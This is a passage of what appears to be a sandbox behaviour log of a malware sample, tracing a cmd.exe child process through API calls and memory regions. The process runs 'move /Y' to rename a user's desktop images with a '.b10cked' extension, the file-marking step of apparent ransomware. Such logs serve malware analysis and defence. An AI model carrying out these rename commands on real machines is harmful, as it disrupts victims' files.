lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", nBufferLength=0x104, lpBuffer=0x24f0bc, lpFilePart=0x24f0a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", lpFilePart=0x24f0a4*="9CDGYB~1.BMP") returned 0x25 [0220.856] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.857] _wcsicmp (_String1="9CDGYB~1.BMP", _String2=".") returned 11 [0220.857] _wcsicmp (_String1="9CDGYB~1.BMP", _String2="..") returned 11 [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgyb~1.bmp")) returned 0x20 [0220.857] SetErrorMode (uMode=0x0) returned 0x0 [0220.857] SetErrorMode (uMode=0x1) returned 0x0 [0220.857] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", nBufferLength=0x104, lpBuffer=0x24f538, lpFilePart=0x24f2d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", lpFilePart=0x24f2d0*="9CDGYB~1.BMP") returned 0x25 [0220.857] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] SetErrorMode (uMode=0x0) returned 0x0 [0220.857] SetErrorMode (uMode=0x1) returned 0x0 [0220.857] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x24f740, lpFilePart=0x24f2d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", lpFilePart=0x24f2d0*="9CDgy bLN0e-uZnqSYBc.bmp.b10cked") returned 0x39 [0220.857] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] SetLastError (dwErrCode=0x0) [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp.b10cked")) returned 0xffffffff [0220.857] GetLastError () returned 0x2 [0220.857] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", fInfoLevelId=0x1, 
lpFindFileData=0x24ec4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec4c) returned 0x340e68 [0220.858] FindNextFileW (in: hFindFile=0x340e68, lpFindFileData=0x24ec4c | out: lpFindFileData=0x24ec4c) returned 0 [0222.979] GetLastError () returned 0x12 [0222.979] FindClose (in: hFindFile=0x340e68 | out: hFindFile=0x340e68) returned 1 [0222.980] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x351bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351bd8) returned 0x340e68 [0222.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x24eee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", lpFilePart=0x0) returned 0x39 [0222.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", nBufferLength=0x104, lpBuffer=0x24eee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", lpFilePart=0x0) returned 0x31 [0222.980] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp")) returned 0x20 [0222.980] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp.b10cked"), dwFlags=0x3) returned 1 [0222.981] FindClose (in: hFindFile=0x340e68 | out: hFindFile=0x340e68) returned 1 [0222.981] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ee98 | out: _Buffer=" 1") returned 9 [0222.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.981] GetFileType (hFile=0x7) returned 0x2 
[0222.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ee24 | out: lpMode=0x24ee24) returned 1 [0222.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.981] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ee58 | out: lpConsoleScreenBufferInfo=0x24ee58) returned 1 [0222.982] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.982] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x24ee98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.982] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ee7c, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x24ee7c*=0x1a) returned 1 [0222.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.983] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.983] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.983] SetConsoleInputExeNameW () returned 0x1 [0222.983] GetConsoleOutputCP () returned 0x1b5 [0222.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.983] exit (_Code=0) Process: id = "573" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x918" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = 
"0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32884 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32885 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32886 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32887 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32888 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32889 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32890 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32891 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32892 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32893 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33176 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33177 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33178 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33179 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33180 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 33181 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33182 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33183 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33184 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33185 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33186 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33187 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33188 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33189 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33190 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 33191 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33192 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33193 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33194 start_va = 0x60000 end_va = 
0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33195 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33196 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 33197 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33198 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 33199 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 776 os_tid = 0xcd8 [0220.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbbc | out: lpSystemTimeAsFileTime=0x16fbbc*(dwLowDateTime=0xb861e0e0, dwHighDateTime=0x1d440a9)) [0220.752] GetCurrentProcessId () returned 0x918 [0220.752] GetCurrentThreadId () returned 0xcd8 [0220.752] GetTickCount () returned 0x3d99c [0220.752] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbb4 | out: lpPerformanceCount=0x16fbb4*=27754171029) returned 1 [0220.753] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.753] __set_app_type (_Type=0x1) [0220.753] __p__fmode () returned 0x76b331f4 [0220.753] __p__commode () returned 0x76b331fc [0220.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.753] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.753] GetCurrentThreadId () returned 0xcd8 [0220.753] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd8) returned 0x38 [0220.753] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.754] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.754] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.754] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb4c | out: phkResult=0x16fb4c*=0x0) returned 0x2 [0220.754] VirtualQuery (in: lpAddress=0x16fb83, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.754] GetConsoleOutputCP () returned 0x1b5 [0220.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.754] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.755] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.755] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.755] GetEnvironmentStringsW () returned 0x300160* [0220.755] FreeEnvironmentStringsW (penv=0x300160) returned 1 [0220.755] GetEnvironmentStringsW () returned 0x300160* [0220.755] FreeEnvironmentStringsW (penv=0x300160) returned 1 [0220.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eabc | out: phkResult=0x16eabc*=0x40) returned 0x0 [0220.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x88, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x0, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegCloseKey (hKey=0x40) returned 0x0 [0220.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eabc | out: phkResult=0x16eabc*=0x40) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: 
lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x0, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegCloseKey (hKey=0x40) returned 0x0 [0220.756] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.756] srand (_Seed=0x5b8863b6) [0220.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" [0220.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" [0220.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.757] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.757] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.757] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.757] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.757] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.757] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.757] GetEnvironmentStringsW () returned 0x3022b0* [0220.757] FreeEnvironmentStringsW (penv=0x3022b0) returned 1 [0220.757] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.757] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.757] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.757] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.757] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.757] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f888 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.757] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f888, lpFilePart=0x16f884 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f884*="Desktop") returned 0x18 [0220.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.758] GetEnvironmentStringsW () returned 0x302ad0* [0220.758] FreeEnvironmentStringsW (penv=0x302ad0) returned 1 [0220.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.759] GetConsoleOutputCP () returned 0x1b5 [0220.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.759] GetUserDefaultLCID () returned 0x409 [0220.759] GetLocaleInfoW 